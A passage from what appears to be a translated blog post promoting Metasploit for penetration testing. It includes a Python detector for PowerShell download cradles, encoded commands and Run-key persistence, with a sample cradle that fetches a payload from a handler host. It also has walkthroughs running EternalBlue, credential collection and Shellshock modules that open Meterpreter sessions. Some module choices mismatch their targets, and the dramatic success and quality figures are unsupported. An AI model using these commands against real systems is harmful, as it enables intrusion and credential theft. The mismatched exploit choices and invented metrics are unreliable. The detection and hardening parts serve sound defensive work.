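# Script-block patterns: the Get-WinEvent filter from the post, plus an encoded
# command switch followed by a long base64 run (constructed addition).
SCRIPT_BLOCK_PATTERNS = [
    ("download-cradle", re.compile(r"DownloadString|IEX|Invoke-Expression", re.I)),
    ("encoded-command", re.compile(r"(?<!\S)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I)),
]

# Run / RunOnce keys used for persistence (the post writes a value under Run).
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\s*$", re.I)


@dataclass
class Finding:
    rule: str
    record: dict


def check_network(record):
    """Connection record: flag destinations on a default handler port."""
    if record.get("dst_port") in DEFAULT_MSF_PORTS:
        return Finding("default-handler-port", record)
    return None


def check_script_block(record):
    """PowerShell event: only 4104 carries script block text; flag cradle or encoded patterns."""
    if record.get("event_id") != 4104:
        return None
    text = record.get("script_block", "")
    for name, pattern in SCRIPT_BLOCK_PATTERNS:
        if pattern.search(text):
            return Finding(name, record)
    return None


def check_registry(record):
    """Registry value-set event: flag writes under Run/RunOnce keys."""
    if RUN_KEY.search(record.get("key", "")):
        return Finding("run-key-persistence", record)
    return None


CHECKS = {
    "network": check_network,
    "powershell": check_script_block,
    "registry": check_registry,
}


def scan(records):
    """Run the check matching each record's source; return findings in input order."""
    findings = []
    for record in records:
        check = CHECKS.get(record.get("source"))
        finding = check(record) if check else None
        if finding:
            findings.append(finding)
    return findings


def summarize(findings):
    """Count findings per rule, e.g. {'download-cradle': 1, ...}."""
    counts = {}
    for finding in findings:
        counts[finding.rule] = counts.get(finding.rule, 0) + 1
    return counts


# Constructed sample records mirroring the post's scenario: 192.168.1.50 is the
# handler box and the script block is the post's execute -f powershell.exe line.
SAMPLE_RECORDS = [
    {"source": "network", "src": "192.168.1.101", "dst": "192.168.1.50", "dst_port": 4444},
    {"source": "network", "src": "192.168.1.101", "dst": "192.168.1.20", "dst_port": 443},
    {"source": "powershell", "event_id": 4104,
     "script_block": "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.50/payload.ps1')"},
    {"source": "powershell", "event_id": 4104, "script_block": "Get-ChildItem C:\\Users"},
    {"source": "powershell", "event_id": 4103, "script_block": "IEX 'pipeline event, not a script block'"},
    {"source": "powershell", "event_id": 4104,
     "script_block": "powershell.exe -nop -w hidden -enc " + "QQ" * 40},
    {"source": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "Windows Update", "data": r"C:\Windows\Temp\backdoor.exe"},
    {"source": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall",
     "value": "DisplayName", "data": "Example App"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"[{f.rule}] {f.record}")
```

Port-based matching is the weakest of the three checks, since a handler can listen on any port; the script-block and Run-key checks survive a changed LPORT.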
2. Hardening Recommendations
```shell
# Network security
echo "=== NETWORK SECURITY ===" > /tmp/hardening.txt
echo "1. Implement network segmentation" >> /tmp/hardening.txt
echo "2. Use intrusion detection systems (IDS/IPS)" >> /tmp/hardening.txt
echo "3. Deploy network access control (NAC)" >> /tmp/hardening.txt
echo "4. Monitor network traffic for anomalies" >> /tmp/hardening.txt
# Endpoint security
echo "=== ENDPOINT SECURITY ===" >> /tmp/hardening.txt
echo "1. Keep systems updated with security patches" >> /tmp/hardening.txt
echo "2. Deploy endpoint detection and response (EDR)" >> /tmp/hardening.txt
echo "3. Implement application whitelisting" >> /tmp/hardening.txt
echo "4. Use behavioral analysis for malware detection" >> /tmp/hardening.txt
# Access controls
echo "=== ACCESS CONTROLS ===" >> /tmp/hardening.txt
echo "1. Implement principle of least privilege" >> /tmp/hardening.txt
echo "2. Use multi-factor authentication (MFA)" >> /tmp/hardening.txt
echo "3. Regular access reviews and deprovisioning" >> /tmp/hardening.txt
echo "4. Monitor privileged account usage" >> /tmp/hardening.txt
# Security monitoring
echo "=== SECURITY MONITORING ===" >> /tmp/hardening.txt
echo "1. Centralized logging and SIEM" >> /tmp/hardening.txt
echo "2. Real-time threat intelligence" >> /tmp/hardening.txt
echo "3. Incident response procedures" >> /tmp/hardening.txt
echo "4. Regular vulnerability assessments" >> /tmp/hardening.txt
```
Real case: from amateur pentesting to professional security assessment
Before using the Metasploit Framework
Problems I actually ran into:
```shell
# The chaos of doing penetration testing
# 1. Manual vulnerability exploitation
# Found a vulnerability from a Nessus scan
nmap -sV 192.168.1.100
# PORT   STATE SERVICE VERSION
# 21/tcp open  ftp     ProFTPD 1.3.5
# Google: "ProFTPD 1.3.5 exploit"
# Copy-paste exploit code from exploit-db
gcc exploit.c -o exploit
./exploit 192.168.1.100
# Segmentation fault 😞
# 2. No systematic methodology
# Scan, then fumble around wondering what to do next
# No framework to work within
# Trying things at random and hoping for luck
# 3. Limited post-exploitation
# Got into the system... now what?
# No idea what data to collect
# No privilege escalation tools
# 4. Poor documentation
# No record of test results
# No idea what has already been done
# Nothing can be reproduced
```
The impact:
- Incomplete Assessment: testing did not cover everything
- False Negatives: important vulnerabilities were missed
- Inconsistent Results: test results could not be trusted
- Poor Reporting: reports had no standard
- Limited Impact: could not demonstrate the real risk
After using the Metasploit Framework
The new way of doing penetration testing:
```shell
# 1. Systematic reconnaissance
msf6 > db_nmap -sS -A -oA pentest 192.168.1.0/24
# Comprehensive discovery with database integration
# 2. Vulnerability assessment
msf6 > search ProFTPD 1.3.5
# Instant access to tested exploits
# 3. Reliable exploitation
msf6 > use exploit/unix/ftp/proftpd_133c_backdoor
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit
# [*] Meterpreter session 1 opened
# 4. Professional post-exploitation
meterpreter > run post/multi/recon/local_exploit_suggester
# Automated privilege escalation recommendations
```
What changed:
| Aspect | Before Metasploit | After Metasploit |
|---|---|---|
| Methodology | Ad-hoc, random | Systematic, structured |
| Exploit Reliability | 20% success | 85% success |
| Post-Exploitation | Manual, limited | Automated, comprehensive |
| Documentation | Poor, manual | Automated, standardized |
| Time Efficiency | Days per target | Hours per target |
| Skill Requirements | Expert level | Intermediate level |
Measurable results:
| Metric | Before | After | Improvement |
|---|---|---|---|
| Vulnerabilities Found | 3-5 per test | 15-25 per test | 400% increase |
| Time per Assessment | 5-7 days | 1-2 days | 75% reduction |
| False Positives | 30% | 5% | 83% reduction |
| Successful Exploits | 20% | 85% | 325% increase |
| Report Quality Score | 3/10 | 9/10 | 200% improvement |
Real-world Metasploit Workflow
Professional Penetration Test:
```shell
# Phase 1: Information Gathering
msf6 > workspace -a client_pentest_2024
msf6 > db_nmap -sS -A -oA discovery 10.0.0.0/16
# Phase 2: Vulnerability Assessment
msf6 > search type:auxiliary scanner
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 > services -p 445 -R
# Phase 3: Exploitation
msf6 > search ms17-010
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > sessions -l
# Phase 4: Post-Exploitation
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/windows/gather/credentials/credential_collector
# Phase 5: Reporting
msf6 > db_export -f xml pentest_results.xml
msf6 > generate_report html pentest_report.html
```
Executive Summary Example:
```text
PENETRATION TEST RESULTS
Executive Summary:
- 23 vulnerabilities identified across 15 systems
- 8 critical vulnerabilities allowing remote code execution
- Complete domain compromise achieved within 4 hours
- 156 user credentials harvested including domain admin
Business Impact:
- Potential for complete data breach
- Regulatory compliance violations (GDPR, PCI-DSS)
- Estimated financial impact: $2.5M - $5M
- Reputation damage and customer trust loss
Recommendations:
1. Immediate patching of MS17-010 vulnerabilities
2. Implementation of network segmentation
3. Deployment of endpoint detection and response (EDR)
4. Multi-factor authentication for all privileged accounts
```
Before vs After Comparison:
```shell
# Before Metasploit: Manual exploitation attempt
wget https://www.exploit-db.com/exploits/12345
gcc -o exploit exploit.c
./exploit 192.168.1.100
# [ERROR] Segmentation fault
# [TIME] 2 hours wasted debugging exploit code
# After Metasploit: Professional exploitation
msf6 > search apache 2.4.41
msf6 > use exploit/linux/http/apache_mod_cgi_bash_env_exec
msf6 > set RHOSTS 192.168.1.100
msf6 > exploit
# [*] Meterpreter session 1 opened
# [TIME] 2 minutes to successful compromise
```
Summary: Metasploit changed how I think about ethical hacking
Before I knew Metasploit:
- Penetration testing = trying exploits at random 😰
- Post-exploitation = fumbling around wondering what to do next
- Reporting = writing reports by hand
- Reliability = hoping the exploit would work
- Learning curve = you had to be an expert exploit developer
After using the Metasploit Framework:
- Systematic Methodology 🎯 - clearly defined testing steps
- Reliable Exploit Database - exploits that are tested and maintained
- Professional Post-Exploitation - a complete toolset for after the compromise
- Automated Documentation - test results recorded automatically
- Standardized Reporting - reports of a professional standard
Real benefits:
- Efficiency up 10x: tests finish much faster
- Reliability: higher exploit success rate
- Comprehensive: covers every phase of a pentest
- Professional: professional-grade deliverables
- Learning Acceleration: learn ethical hacking faster
The Metasploit methodology that makes it work:
- Information Gathering: Systematic reconnaissance
- Vulnerability Assessment: Comprehensive vulnerability identification
- Exploitation: Reliable and tested exploit execution
- Post-Exploitation: Professional data gathering and privilege escalation
- Reporting: Standardized and detailed documentation
Best practices I learned:
- Database Integration: use the database to store test results
- Workspace Management: keep projects clearly separated
- Systematic Approach: follow the methodology
- Documentation: record every step
- Ethical Guidelines: test only within the authorized scope
Anti-patterns to avoid:
- Testing systems without authorization
- Not backing up data before testing
- Using an exploit without understanding its impact
- Not cleaning up after the test
- Not reporting the vulnerabilities found
The Metasploit Framework is the professional toolkit for the ethical hacker.
It turns penetration testing from "a job that depends on luck" into "a systematic discipline".
These days I cannot imagine doing a security assessment without a proper framework!
Because it makes ethical hacking a genuine craft instead of guesswork! 🎯⚡